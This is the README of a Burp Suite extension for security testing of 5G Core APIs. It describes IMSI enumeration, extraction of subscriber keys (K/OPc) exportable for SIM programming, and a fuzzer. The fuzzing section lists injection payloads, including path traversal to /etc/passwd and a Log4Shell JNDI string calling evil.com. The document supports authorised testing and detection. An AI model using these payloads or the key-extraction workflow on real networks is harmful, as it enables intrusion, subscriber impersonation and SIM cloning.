Burp Suite Extension for 5G Core Network Security Testing
The 5GC API Penetration Testing Suite is a comprehensive Burp Suite extension designed for security testing of 5G Core (5GC) networks. Developed by Penthertz, this tool automates the discovery, enumeration, and exploitation of vulnerabilities in 5G Service-Based Interfaces (SBI).
This tool replaces the 5GC API parser Burp Suite extension we released a few years ago.
Author: Sébastien Dudek @Penthertz
Company: Penthertz - RF Security & Telecommunications Security Experts
License: Apache License 2.0
Version: 1.0 Community Edition
- Auto-Audit: One-click automated assessment
- Network Function Discovery: Enumerate all 5GC network functions via NRF
- IMSI Enumeration: Discover active subscribers through UDM API
- Credential Extraction: Extract permanent authentication keys (K, OPc) from UDR
- Vulnerability Detection: Automated security issue identification
- OAuth2 Support: 3GPP TS 29.510 OAuth2 workflow (manual token acquisition)
- mTLS Configuration: Mutual TLS authentication support (beta)
- JWT Bearer Tokens: Automatic token injection into requests
- Production Safety: Rate limiting and request delay controls
- OpenAPI-based Fuzzing: Load 3GPP YAML specs and fuzz endpoints
- Template-based Fuzzing: Use $$markers$$ for precise payload injection
- Request/Response Viewer: Detailed HTTP traffic analysis
- Burp Integration: Send requests to Repeater, report to Scanner
- Dashboard: Real-time statistics and quick actions
- Configuration: Complete 5GC network topology setup
- Discovered Assets: NF and IMSI tables with export
- Credentials: Secure credential management and export (JSON, CSV, pySim)
- Security Issues: Detailed vulnerability reports with request/response evidence
- API Fuzzing: Interactive fuzzing with payload categories
- Activity Log: Comprehensive logging with export
- Core NFs: NRF, UDM, UDR, AUSF, AMF, SMF, PCF
- Additional NFs: BSF, NSSF, SMSF, NEF, SCP, SEPP, UPF, and more
- API Versioning: Auto-detection and configuration (v1, v2, v3)
- SCP Proxy: Automatic detection and use of Service Communication Proxy
- Burp Suite Professional (recommended) or Community Edition
- Python/Jython 2.7 (included with Burp Suite)
- Java 8+ (for Burp Suite)
- 5G Core Network (e.g., Open5GS, free5GC, commercial 5GC)
- Network access to 5GC SBI interfaces (typically HTTP on port 7777)
- Optional: OAuth2 server for authentication testing
- Optional: mTLS certificates for mutual authentication
- 3GPP Release 16/17/18 OpenAPI YAML files
- Available from: jdegre/5GC_APIs
git clone https://github.com/PentHertz/5GC_API_pentest
cd 5GC_API_pentest
Note: Ensure you have Jython installed in Burp Suite.
- Open Burp Suite
- Navigate to Extender → Extensions
- Click Add
- Set Extension Type to Python
- Select the 5GC_API_Pentest.py file
- Click Next
The extension should load successfully with output:
======================================================================
5GC API PENTEST SUITE v1.0 - Burp Extension (Community Edition)
Penthertz Security Research
======================================================================
[+] 5GC API Pentest Suite v1.0 (Community Edition) loaded successfully!
A new tab "5GC API Pentest" will appear in Burp Suite.
Go to the Configuration tab:
NRF URL: http://127.0.0.10:7777 <--- at least this one is required
UDM URL: http://127.0.0.12:7777 (optional)
UDR URL: http://127.0.0.20:7777 (optional)
AUSF URL: http://127.0.0.11:7777 (optional)
AMF URL: http://127.0.0.5:7777 (optional)
SMF URL: http://127.0.0.4:7777 (optional)
Tip: The extension can auto-populate these after NF discovery.
Base IMSI: 999700000000
Start Range: 1
End Range: 100
Workers: 10
Go to the Dashboard tab and click:
🔴 Auto-Audit
This will automatically:
- ✓ Discover all Network Functions
- ✓ Enumerate valid IMSIs
- ✓ Extract authentication credentials
- ✓ Detect security vulnerabilities
- Discovered Assets: View NFs and IMSIs
- Credentials: Extracted K/OPc keys
- Security Issues: Detailed vulnerability reports
The extension implements the 3GPP TS 29.510 OAuth2 specification with a manual token acquisition workflow.
Go to Configuration → OAuth2 / JWT Authentication:
NRF OAuth2 URL: http://127.0.0.10:7777/oauth2/token
NF Instance ID: 12345678-1234-1234-1234-123456789abc
NF Type: AMF
Target NF Type: (optional)
Scope: nnrf-disc nnrf-nfm
Click "Generate OAuth2 Request"
The extension will display:
# CURL COMMAND
curl -X POST 'http://127.0.0.10:7777/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d 'grant_type=client_credentials&nfInstanceId=...'
Option A: Copy the curl command and run it in a terminal
Option B: Click "Send to Burp Repeater" and execute
- Copy the access_token from the JSON response:
{ "access_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...", "token_type": "Bearer", "expires_in": 3600 }
- Paste the token into the "Access Token" field
- Click "Activate Token" (green button)
- Check: ✓ Enable OAuth2 Bearer Token for all requests
All subsequent requests will include:
Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
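As an added illustration (not the extension's own code), this stand-alone Python 3 snippet builds the client_credentials form body the extension generates and decodes the returned JWT's header and claims, without signature verification, so the algorithm, granted scope and remaining lifetime can be checked before the token is activated. The claim names (iss, sub, aud, scope, exp) follow TS 29.510; the sample token's claims and signature are constructed, and only its header matches the one shown above.

```python
import base64
import json
from urllib.parse import urlencode

def build_token_request(nf_instance_id, nf_type, scope, target_nf_type=None):
    """Form body for POST /oauth2/token with grant_type=client_credentials.
    Field names follow the TS 29.510 AccessTokenReq type; targetNfType is optional."""
    params = {"grant_type": "client_credentials", "nfInstanceId": nf_instance_id,
              "nfType": nf_type, "scope": scope}
    if target_nf_type:
        params["targetNfType"] = target_nf_type
    return urlencode(params)  # spaces in scope become '+', as in a form body

def _b64url_decode(segment):
    segment += "=" * (-len(segment) % 4)  # JWT segments are unpadded base64url
    return base64.urlsafe_b64decode(segment)

def inspect_token(token, now):
    """Decode the header and claims of a JWS access token WITHOUT verifying the
    signature (that needs the NRF public key). `now` is the current Unix time.
    Returns what to check before clicking Activate Token: algorithm, scope,
    audience and remaining lifetime, plus the header the extension will inject."""
    header_b64, claims_b64, _signature = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    claims = json.loads(_b64url_decode(claims_b64))
    return {
        "alg": header.get("alg"),
        "unsigned": str(header.get("alg", "none")).lower() == "none",  # must be False
        "scope": claims.get("scope", "").split(),
        "aud": claims.get("aud"),
        "seconds_left": int(claims.get("exp", 0) - now),
        "bearer_header": "Authorization: Bearer " + token,
    }

def _b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

# Constructed sample token: genuine RS256 header, made-up claims, dummy signature.
SAMPLE_TOKEN = ".".join([
    _b64url(json.dumps({"alg": "RS256", "typ": "JWT"}, separators=(",", ":")).encode()),
    _b64url(json.dumps({"iss": "nrf-instance-id-placeholder", "aud": "UDM",
                        "sub": "12345678-1234-1234-1234-123456789abc",
                        "scope": "nnrf-disc nnrf-nfm", "exp": 1736951400},
                       separators=(",", ":")).encode()),
    _b64url(b"dummy-signature-bytes"),
])
```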
- Download the 3GPP specs:
git clone https://github.com/jdegre/5GC_APIs.git
- Run 5GC_API_YAML_file_corrector_for_SnakeYAML.py against this repository to fix Unicode and other issues; otherwise some YAML files will not be parsed correctly
- In Burp Suite, go to the API Fuzzing tab and click "Load API Directory..."
- Select the 5GC_APIs/ folder
The extension will parse all YAML files and display available APIs.
- Select API: Click on an API (e.g., "Nudm_SDM")
- Select Endpoint: Choose an endpoint (e.g., GET /nudm-sdm/v2/imsi-{imsi}/am-data)
A request template will be generated with $$markers$$:
GET /nudm-sdm/v2/imsi-$$imsi$$/am-data HTTP/1.1
Host: $$host$$
Content-Type: application/json
Accept: application/json
Rename markers, or wrap other parameters in the $$param$$ marker, to choose what gets fuzzed.
Base URL:
http://127.0.0.12:7777
Threads: 5
Delay: 100ms
Option A: Load from file (one payload per line)
Option B: Load by category:
- SQL Injection
- XSS (Cross-Site Scripting)
- Path Traversal
- 5GC Specific - IMSI
Option C: Manual entry:
' OR '1'='1
../../../etc/passwd
999700000000001
${jndi:ldap://evil.com/a}
Click "Start Fuzzing"
The extension will:
- Replace each $$marker$$ (generally marked as $$param$$) with payloads
- Send requests and analyze responses
- Detect anomalies (errors, injections, large responses)
- Display results in real-time
- Click row to view full request/response
- Right-click → "Send to Repeater" for further testing
- Export results for reporting
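Added example, not the extension's code: how a $$marker$$ template is expanded into concrete requests and how responses are triaged for the anomaly classes listed above. The template, host value and IMSI payloads are constructed, and the error-disclosure keyword list and size threshold are assumptions.

```python
import re

MARKER = re.compile(r"\$\$(\w+)\$\$")

# Constructed request template in the extension's $$marker$$ notation.
TEMPLATE = ("GET /nudm-sdm/v2/imsi-$$param$$/am-data HTTP/1.1\r\n"
            "Host: $$host$$\r\n"
            "Accept: application/json\r\n\r\n")

def expand(template, fixed, payloads, fuzz_marker="param"):
    """Yield (payload, request) pairs: every $$marker$$ is filled from `fixed`
    except `fuzz_marker`, which receives each payload in turn. A marker with no
    value is an error rather than being sent to the target literally."""
    for payload in payloads:
        values = dict(fixed)
        values[fuzz_marker] = payload
        def fill(match):
            name = match.group(1)
            if name not in values:
                raise KeyError("unfilled marker $$%s$$" % name)
            return values[name]
        yield payload, MARKER.sub(fill, template)

# Assumed indicators of verbose error disclosure in a response body.
ERROR_HINTS = ("traceback", "exception", "syntax error", "mongo", "sql")

def classify(status, body, baseline_len):
    """Flag the anomaly classes listed above: server errors, error disclosure in
    the body, and a response far larger than the baseline (unfuzzed) response."""
    flags = []
    if status >= 500:
        flags.append("server-error")
    if any(hint in body.lower() for hint in ERROR_HINTS):
        flags.append("error-disclosure")
    if baseline_len and len(body) > 3 * baseline_len:
        flags.append("large-response")
    return flags
```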
JSON Format:
{
"timestamp": "2025-01-15 14:30:00",
"total_credentials": 50,
"credentials": [
{
"imsi": "999700000000001",
"k": "465B5CE8B199B49FAA5F0A2EE238A6BC",
"opc": "E8ED289DEBA952E4283B54E88E6183CA",
"sqn": "000000000001",
"amf": "8000"
}
]
}
CSV Format:
IMSI,K,OPc,SQN,AMF,Timestamp
999700000000001,465B5CE8...,E8ED289D...,000000000001,8000,2025-01-15 14:30:00
pySim Format (for SIM card programming):
[
{
"IMSI": "999700000000001",
"Ki": "465B5CE8B199B49FAA5F0A2EE238A6BC",
"OPc": "E8ED289DEBA952E4283B54E88E6183CA",
"ADM1": "00000000",
"ICCID": "8988211000000000001"
}
]
Comprehensive JSON report including:
- Network Functions discovered
- IMSIs enumerated
- Credentials extracted
- Security issues with request/response evidence
- Configuration snapshot
Enable PRODUCTION MODE for safe testing:
✓ PRODUCTION MODE (enables safety features)
Max Requests/Second: 10
Request Delay (ms): 500
Max Concurrent Threads: 3
🟢 Stealth Mode (Safe):
- 3 workers, 5 req/s, 500ms delay
- IMSI range: 1-100
- Best for: Production testing
🟡 Balanced Mode (Normal):
- 10 workers, 20 req/s, 100ms delay
- IMSI range: 1-1000
- Best for: Lab testing
🔴 Aggressive Mode (Fast):
- 30 workers, 100 req/s, 10ms delay
- IMSI range: 1-10000
⚠️ Lab environments only!
Auto-detect, or manually configure:
NRF API Version: v1
UDM API Version: v2
UDR API Version: v2
AUSF API Version: v1
Click "Auto-Detect Versions" to automatically identify supported versions.
Scenario: Test if NRF allows unauthenticated network function enumeration
Steps:
- Configure NRF URL
- Dashboard → "Discover NFs"
- Review Discovered Assets tab
- Check Security Issues for "Missing Authentication" vulnerability
Expected Finding: High severity issue if authentication is not required
Scenario: Test if UDM allows IMSI enumeration without authentication
Steps:
- Configure UDM URL and IMSI range
- Dashboard → "Enumerate IMSIs"
- Review discovered IMSIs
- Check for "Privacy Violation" security issue
Expected Finding: High severity if sequential IMSI testing succeeds
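A defender's counterpart to this scenario, added here and not part of the extension: detection logic that flags a sequential, unauthenticated IMSI sweep against Nudm_SDM in UDM access logs. The log format and sample lines are constructed, and the window and count thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed UDM access-log lines (not a real Open5GS/free5GC log format):
#   <ISO 8601 time> src=<consumer IP> auth=<bearer|none> <method> <path> <status>
SAMPLE_LOG = """\
2025-01-15T14:30:00Z src=10.0.0.9 auth=none GET /nudm-sdm/v2/imsi-999700000000001/am-data 200
2025-01-15T14:30:00Z src=10.0.0.9 auth=none GET /nudm-sdm/v2/imsi-999700000000002/am-data 404
2025-01-15T14:30:01Z src=10.0.0.9 auth=none GET /nudm-sdm/v2/imsi-999700000000003/am-data 404
2025-01-15T14:30:01Z src=10.0.0.9 auth=none GET /nudm-sdm/v2/imsi-999700000000004/am-data 200
2025-01-15T14:30:02Z src=10.0.0.9 auth=none GET /nudm-sdm/v2/imsi-999700000000005/am-data 404
2025-01-15T14:31:10Z src=10.0.0.5 auth=bearer GET /nudm-sdm/v2/imsi-999700000000042/am-data 200
"""

LINE = re.compile(r"^(\S+) src=(\S+) auth=(\S+) \S+ /nudm-sdm/v\d+/imsi-(\d+)/\S+ (\d{3})$")

def detect_enumeration(log_text, window_s=60, min_distinct=5):
    """Per consumer address: flag a burst of at least `min_distinct` distinct
    IMSIs inside `window_s` seconds whose values form a near-contiguous run
    (sequential probing), and note whether the burst carried no bearer token.
    Both 200 and 404 answers count, since either reveals whether a SUPI exists."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            by_src[m.group(2)].append((ts, int(m.group(4)), m.group(3)))
    findings = []
    for src, events in by_src.items():
        events.sort()
        for i, (start, _, _) in enumerate(events):
            run = [e for e in events[i:] if (e[0] - start).total_seconds() <= window_s]
            imsis = sorted({e[1] for e in run})
            # near-contiguous: the span of values is less than twice their count
            if len(imsis) >= min_distinct and imsis[-1] - imsis[0] < 2 * len(imsis):
                findings.append({"src": src, "distinct_imsis": len(imsis),
                                 "unauthenticated": all(e[2] == "none" for e in run)})
                break  # one finding per consumer is enough
    return findings
```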
Scenario: Test if UDR exposes permanent authentication keys
Steps:
- Run IMSI enumeration first
- Dashboard → "Extract Credentials"
- Review Credentials tab for K/OPc values
- Export credentials for offline analysis
Expected Finding: Critical vulnerability if K/OPc are accessible without authentication
Scenario: Test OAuth2 token workflow and validation
Steps:
- Configure OAuth2 parameters
- Generate and execute token request
- Activate token
- Run attacks with OAuth enabled
- Compare results with/without authentication
Expected Finding: Proper authentication should block unauthorized access
Scenario: Test for SQL/NoSQL injection vulnerabilities
Steps:
- Load 3GPP OpenAPI specs
- Select UDR authentication endpoint
- Load "SQL Injection" payload category
- Start fuzzing
- Review anomalies (500 errors, error disclosure)
Expected Finding: Properly sanitized inputs should not produce errors
Copyright 2025 Sébastien Dudek / Penthertz
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
- Open5GS team for open-source 5G Core implementation
- PortSwigger for Burp Suite framework
- jdegre for maintaining 5GC_APIs repository
- The 5G security research community